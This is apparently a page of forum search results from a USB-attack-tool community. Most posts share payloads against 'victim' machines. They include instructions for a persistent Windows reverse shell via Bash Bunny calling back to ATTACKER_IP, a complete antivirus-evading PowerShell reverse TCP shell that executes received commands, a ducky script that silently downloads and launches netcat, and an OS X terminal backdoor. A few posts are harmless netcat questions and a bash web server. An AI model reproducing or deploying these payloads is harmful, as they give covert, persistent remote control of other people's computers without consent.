Search the Community

Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 ?) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download

I successfully implemented the root payload on Mac and PC I have a linux box waiting that connected successfully as root on both devices My question is, how do I handle multiple machines? Give each one a different port? That seems obnoxious to have to port forward each one so I know that isnt right Is there a "session manager" or a way for a webserver to catch those connection requests?

Reverse TCP Shell using Powershell Only Hi Guys. I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/basic4/WiDucky) Just setup a netcat listener on the attacker machine with: nc -l 6673 I've added code for the script to automatically reconnect to the attacker if connection is lost, and the script also returns shell error text to the listener too. The Powershell Script itself (could still use some tidying up - but works perfectly as is :) while (1 -eq 1) { $ErrorActionPreference = 'Continue'; try { #attempt inital connection $client = New-Object System.Net.Sockets.TCPClient("192.168.0.17",6673); $stream = $client.GetStream(); [byte[]]$bytes = 0..255|%{0}; $sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> "); $stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush(); while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;} try { #attempt to execute the received command $sendback = (iex $recdata 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; } catch { $error[0].ToString() + $error[0].InvocationInfo.PositionMessage; $sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> "; cls; } $returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush(); } } catch { #an initial connection error - close and wait 30 secs then retry if($client.Connected) { $client.Close(); } cls; Start-Sleep -s 30; } } This is my first powershell script. But given how easy it was to get this working, I'm certainly going to use it more. Regards, Basic4. PS_TCP4.ps1

Hello everyone Dtpk here and well I did a thing using Netcat and the usb rubber ducky to make a invisible reverse shell in under a few seconds I didn't time it this time but if I had to guess its about 8 to 9 seconds maybe a little faster first it navigates to userprofile folder then it downloads unzip.exe from either you own drop box or mine if you chose not to change the code then it downloads netcat from its site extracts it from command line using unzip.exe then it makes a batch file to invoke netcat to open a port on 190 then we use vbs script to launch the batch file invisibly. Also I have a video that is a little more in depth if you wish to check that out. Net Cat Script.txt

This Payload is tested in the latest version of OS X El Capitan. It Simply opens Terminal and starts a reverse NetCat to your computer, when it connects it minimizes the terminal window You might want to mess around with the delay DELAY 1000 GUI SPACE DELAY 200 STRING TERMINAL DELAY 300 STRING nc -l IPADRESS 8888 DELAY 100 GUI M Temperary NC backdoor.txt

So, I want to make a safe chatroom that uses the terminal or command line on my kali linux pc for multiple participants that is unspyable with something like SSH connection. At the moment I use netcat (nc -l <porttolisten>) but other users cant communicate with each other only with the server. Any suggestions??

I need someone with some bashfu. I would like a bash script that can execute a nc -l -p 1025 command, then redirect the stdout to 1 mkfifo and the stdin to a 2nd mkfifo. anyone know how to do that? tyvm

HI, I have just got my rubber ducky and playing around with the payload script "Payload netcat FTP download and reverse shell" I don't know where to find the netcat exe for windows in order to place in the ftp site for download with the script. I have found one that is installed with NMap but when I try and run it from the windows command prompt after a successful download it fails stating that it is a 16 bit application Can anyone advise on this please Thanks

Recently came across a bash only web server (using netcat) at http://paulbuchheit.blogspot.ro/2007/04/webserver-in-bash.html I fiddled a little with it and turned it into a decent web server, with server logs and all. (no IP captured, just the query string and timestamp) It supports file downloads, it servers static html, PHP, Python and binary files with arguments (GET). It checks for 404 errors and it keeps a server log. Fun facts: 5 times slower then nginx (for a single user) executes binary faster then displays static content php is the slowest :) php files need to be .php python files .py binaries .cb (C binary:) ) It's great if you just need a server for a short period of time and don't need security... It only works on Linux. (I've tested it under ubuntu) I had great fun working on it. I hope you'll have as much fun with it as had. If you find an use for it, drop me a line. server.zip